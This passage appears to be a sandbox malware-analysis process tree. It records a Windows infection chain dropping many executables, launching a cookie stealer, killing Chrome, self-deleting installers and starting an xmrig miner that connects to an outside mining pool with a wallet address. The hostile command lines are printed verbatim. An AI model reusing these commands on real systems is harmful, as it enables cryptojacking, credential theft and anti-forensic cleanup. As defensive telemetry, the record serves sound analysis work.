                                                                                                                                                                    "C:\Program Files\Java\JLCOFVXOWP\prolab.exe" /VERYSILENT
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:6520
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-NGBRJ.tmp\prolab.tmp
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-NGBRJ.tmp\prolab.tmp" /SL5="$302A0,575243,216576,C:\Program Files\Java\JLCOFVXOWP\prolab.exe" /VERYSILENT
                                                                                                                                                                        14⤵
                                                                                                                                                                          PID:6864
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\de-866bc-dae-d2f9c-248a89d7d91e5\Raezhipyxike.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\de-866bc-dae-d2f9c-248a89d7d91e5\Raezhipyxike.exe"
                                                                                                                                                                        13⤵
                                                                                                                                                                          PID:2088
                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                            dw20.exe -x -s 1844
                                                                                                                                                                            14⤵
                                                                                                                                                                              PID:3792
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\87-983ca-9a0-d2f8e-d059acac3a07b\Hunaluxaesho.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\87-983ca-9a0-d2f8e-d059acac3a07b\Hunaluxaesho.exe"
                                                                                                                                                                            13⤵
                                                                                                                                                                              PID:5804
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rzagwxfv.4ty\sskiper.exe /s & exit
                                                                                                                                                                                14⤵
                                                                                                                                                                                  PID:6976
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\rzagwxfv.4ty\sskiper.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\rzagwxfv.4ty\sskiper.exe /s
                                                                                                                                                                                    15⤵
                                                                                                                                                                                      PID:4772
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\619493879.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\619493879.exe
                                                                                                                                                                                        16⤵
                                                                                                                                                                                          PID:8056
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jf4tllzh.5xq\KiffMainE1.exe & exit
                                                                                                                                                                                      14⤵
                                                                                                                                                                                        PID:6228
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jf4tllzh.5xq\KiffMainE1.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jf4tllzh.5xq\KiffMainE1.exe
                                                                                                                                                                                          15⤵
                                                                                                                                                                                            PID:4836
                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                              dw20.exe -x -s 1148
                                                                                                                                                                                              16⤵
                                                                                                                                                                                                PID:4328
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dx2nrgnw.mxa\001.exe & exit
                                                                                                                                                                                            14⤵
                                                                                                                                                                                              PID:5852
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\dx2nrgnw.mxa\001.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\dx2nrgnw.mxa\001.exe
                                                                                                                                                                                                15⤵
                                                                                                                                                                                                  PID:3164
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4kumx0h3.h3j\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                14⤵
                                                                                                                                                                                                  PID:1128
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4kumx0h3.h3j\installer.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\4kumx0h3.h3j\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                      PID:6768
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zawmpz43.wqf\gpooe.exe & exit
                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                      PID:7088
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\zawmpz43.wqf\gpooe.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\zawmpz43.wqf\gpooe.exe
                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                          PID:6652
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                              PID:7316
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                PID:8172
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                  PID:7752
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bn3js4eu.sgs\sskiper.exe /s & exit
                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                PID:5656
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\bn3js4eu.sgs\sskiper.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\bn3js4eu.sgs\sskiper.exe /s
                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                    PID:3956
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i0fnseto.cdo\google-game.exe & exit
                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                    PID:4360
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\i0fnseto.cdo\google-game.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\i0fnseto.cdo\google-game.exe
                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                        PID:7580
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                          "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                            PID:2908
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hydnpkwd.u3c\askinstall39.exe & exit
                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                          PID:1004
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\hydnpkwd.u3c\askinstall39.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\hydnpkwd.u3c\askinstall39.exe
                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                              PID:7832
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                  PID:3208
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                    PID:932
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\irgusdqh.cfw\y1.exe & exit
                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                PID:4208
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\irgusdqh.cfw\y1.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\irgusdqh.cfw\y1.exe
                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                    PID:7960
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u3ujn2zd.imp\setup.exe & exit
                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                    PID:952
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\u3ujn2zd.imp\setup.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\u3ujn2zd.imp\setup.exe
                                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                                        PID:4732
                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sstahgeh.rat\toolspab1.exe & exit
                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                        PID:4744
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\sstahgeh.rat\toolspab1.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\sstahgeh.rat\toolspab1.exe
                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                            PID:8116
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\sstahgeh.rat\toolspab1.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\sstahgeh.rat\toolspab1.exe
                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                PID:7980
                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cjkgk4qe.4db\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                              PID:2788
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ed2czvsi.uhn\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                PID:4332
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ed2czvsi.uhn\SunLabsPlayer.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\ed2czvsi.uhn\SunLabsPlayer.exe /S
                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                    PID:6632
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj75AB.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                                        PID:2860
                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe
                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe"
                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                              PID:5856
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                  PID:7084
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                    PID:4004
                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe
                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe"
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                  PID:5792
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\JKwiaGEhftQVjeTjnybiVzHM.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\JKwiaGEhftQVjeTjnybiVzHM.exe"
                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                      PID:4528
                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\setup.exe
                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\setup.exe"
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                          PID:6932
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Program Files (x86)\Company\NewProduct\setup.exe"
                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                              PID:6396
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                PID:6148
                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                              PID:6924
                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\pwang.exe
                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\pwang.exe"
                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                PID:6964
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                    PID:4760
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\ifhvvyy.exe
                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\ifhvvyy.exe"
                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                    PID:6916
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                        PID:6704
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                          PID:4628
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                            PID:7720
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                              PID:6184
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\r3INGWwUTKUqcjKciZ1M0uzz.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\r3INGWwUTKUqcjKciZ1M0uzz.exe"
                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                            PID:5380
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\p1ek4o8sFe6dDScJQIbPADXZ.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\p1ek4o8sFe6dDScJQIbPADXZ.exe"
                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                              PID:4840
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{hezp-EVqEu-wRZs-EchCk}\04131370133.exe"
                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                  PID:5024
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\{hezp-EVqEu-wRZs-EchCk}\04131370133.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\{hezp-EVqEu-wRZs-EchCk}\04131370133.exe"
                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                      PID:5412
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\{hezp-EVqEu-wRZs-EchCk}\04131370133.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\{hezp-EVqEu-wRZs-EchCk}\04131370133.exe"
                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                          PID:3084
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{hezp-EVqEu-wRZs-EchCk}\43135033095.exe" /mix
                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                        PID:6132
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\{hezp-EVqEu-wRZs-EchCk}\43135033095.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\{hezp-EVqEu-wRZs-EchCk}\43135033095.exe" /mix
                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                            PID:6852
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6852 -s 600
                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              PID:6864
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6852 -s 612
                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              PID:5524
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6852 -s 592
                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              PID:4108
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6852 -s 656
                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              PID:6004
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6852 -s 668
                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              PID:6828
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{hezp-EVqEu-wRZs-EchCk}\84106090784.exe" /mix
                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                            PID:4984
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\{hezp-EVqEu-wRZs-EchCk}\84106090784.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\{hezp-EVqEu-wRZs-EchCk}\84106090784.exe" /mix
                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                PID:4372
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 756
                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                  PID:6212
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 768
                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                  PID:5760
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 1444
                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                  PID:5708
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 1428
                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                  PID:5336
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 1520
                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                  PID:5716
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 1572
                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                  PID:3000
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exe
                                                                                                                                                                                                                                                                                                  edspolishpp.exe
                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                    PID:6164
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "p1ek4o8sFe6dDScJQIbPADXZ.exe" /f & erase "C:\Users\Admin\AppData\Roaming\p1ek4o8sFe6dDScJQIbPADXZ.exe" & exit
                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                  PID:6320
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                    taskkill /im "p1ek4o8sFe6dDScJQIbPADXZ.exe" /f
                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                    PID:3968
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\RBioLrzy9iZAZpIVXh6SZYcC.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\RBioLrzy9iZAZpIVXh6SZYcC.exe"
                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                  PID:4952
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\xmrig.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\xmrig.exe" -p trinity-miner --donate-level 5 -o pool.supportxmr.com:443 -u 89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM -k --tls
                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                      PID:5968
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\HsycZFAjgL67AbhELsTwwxZn.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\HsycZFAjgL67AbhELsTwwxZn.exe"
                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                      PID:5908
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\bnYOfPCleEPJKQtHuGpX2ggo.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\bnYOfPCleEPJKQtHuGpX2ggo.exe"
                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                        PID:5004
                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\toolspab2.exe
                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"
                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                            PID:6724
                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\toolspab2.exe
                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"
                                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                                PID:6284
                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\pub02.exe
                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\pub02.exe"
                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                PID:6736
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\Company\NewProduct\pub02.exe"
                                                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                                                    PID:1368
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 3
                                                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                                                      PID:1948
                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\KiffApp2.exe
                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\KiffApp2.exe"
                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                    PID:6716
                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                                      PID:6772
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Uver88tzypa6nl8RdcnRUwQu.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Uver88tzypa6nl8RdcnRUwQu.exe"
                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                      PID:3168
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\xTsFyHM36cKtvRQTD3woX7eC.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\xTsFyHM36cKtvRQTD3woX7eC.exe"
                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                        PID:3912
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\nEinLrMT7RbBJy0JauT3mQxJ.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\nEinLrMT7RbBJy0JauT3mQxJ.exe"
                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                          PID:6260
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\GeDMVDH7ESsgMQdfJaOxznfI.exe
